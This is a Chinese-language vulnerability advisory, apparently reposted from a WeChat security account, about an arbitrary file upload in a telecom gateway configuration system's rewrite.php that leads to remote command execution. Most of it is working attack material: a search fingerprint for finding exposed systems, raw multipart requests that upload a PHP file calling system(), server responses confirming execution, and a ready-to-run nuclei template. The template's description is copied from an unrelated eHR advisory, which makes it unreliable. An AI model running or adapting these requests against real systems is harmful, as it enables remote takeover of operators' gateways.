01
—
漏洞名称
02
—
漏洞影响
电信网关配置管理系统
03
—
漏洞描述
电信网关配置管理系统是一种用于管理和配置电信网关设备的软件系统。该系统具有用户友好的界面,支持对网关设备进行集中管理、配置和监控。通过该系统,运营商可以轻松地对网关进行参数设置、路由配置、性能监测和故障诊断。此外,系统还提供权限管理功能,确保只有授权人员可以进行配置修改。通过实时更新和报警功能,系统能够及时发现并响应网络问题,保障网络的稳定性和安全性。
该系统rewrite.php接口处存在任意文件上传漏洞,同时会导致任意命令执行。这会导致系统被黑客远控,请及时修复。
04
—
body
=
"img/login_bg3.png"
&& body=
"系统登录"
05
—
漏洞复现
第一步,上传文件,执行系统命令echo ywivnebthzckamzybmxj写入文件
POST
/manager/teletext/material/rewrite.php
HTTP/1.1
Host
: x.x.x.x
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Length
: 325
Connection
: close
Content-Type
: multipart/form-data; boundary=----WebKitFormBoundaryzgxzdlsw
Accept-Encoding
: gzip
------WebKitFormBoundaryzgxzdlsw
Content-Disposition: form-data; name=
"tmp_name"
; filename=
"xfakqbto.php"
Content-Type: image/png
system(
"echo ywivnebthzckamzybmxj"
);unlink(
__FILE__
);
------WebKitFormBoundaryzgxzdlsw
Content-Disposition: form-data; name=
"uploadtime"
------WebKitFormBoundaryzgxzdlsw--
响应内容如下,其中url是回显文件路径
HTTP/1.1
200
OK
Connection
: close
Content-Length
: 107
Access-Control-Allow-Origin
: *
Content-Type
: application/json; charset=UTF-8
Date
: Thu, 23 May 2024 03:45:23 GMT
Server
: Apache/2.2.15 (CentOS)
X-Powered-By
: PHP/5.3.3
{
"ret"
:
0
,
"ret_msg"
:
"success"
,
"url"
:
"/xmedia/material/xfakqbto.php"
,
"date"
:
"20240523_114523_1716435923."
}
第二步,访问回显文件
http:
/
/x.x.x.x/xmedia
/material/xfakqbto
.php
响应数据包如下
HTTP/1.1
200
OK
Connection
: close
Content-Length
: 21
Access-Control-Allow-Origin
: *
Content-Type
: text/html; charset=UTF-8
Date
: Thu, 23 May 2024 03:45:23 GMT
Server
: Apache/2.2.15 (CentOS)
X-Powered-By
: PHP/5.3.3
ywivnebthzckamzybmxj
漏洞复现成功
06
—
nuclei poc
poc文件内容如下
id
: dianxin-rewrite-fileupload
info
:
name
:
电信网关配置管理系统 rewrite.php 任意文件上传漏洞
author
:
fgz
severity
:
critical
description
:
某云eHR是大中型企业广泛采用人力资源管理系统。某云是国内顶尖的HR软件供应商,是新一代eHR系统的领导者。该系统PtFjk.mob接口处存在任意文件上传漏洞,容易导致系统被远控。
metadata
:
:
1
:
app="和丰山海-数字标牌"
verified
:
true
variables
:
file_name
:
"{{to_lower(rand_text_alpha(8))}}"
file_content
:
"{{to_lower(rand_text_alpha(20))}}"
rboundary
:
"{{to_lower(rand_text_alpha(8))}}"
requests
:
raw:
|+
POST
/manager/teletext/material/rewrite.php HTTP/1.1
Host
:
{{Hostname}}
:
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
:
multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
Connection
:
close
------WebKitFormBoundary{{rboundary}}
:
form-data; name="tmp_name"; filename="{{file_name}}.php"
:
image/png
system("echo {{file_content}}");unlink(__FILE__);?>
------WebKitFormBoundary{{rboundary}}
:
form-data; name="uploadtime"
------WebKitFormBoundary{{rboundary}}--
|
GET
{{name}} HTTP/1.1
Host
:
{{Hostname}}
:
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
:
gzip
extractors
:
type: json
part
:
body
name
:
name
json
:
'.url'
internal
:
true
matchers
:
type: dsl
dsl
:
"status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '{{file_content}}')"
07
—
修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):某网关配置管理系统 rewrite.php 任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论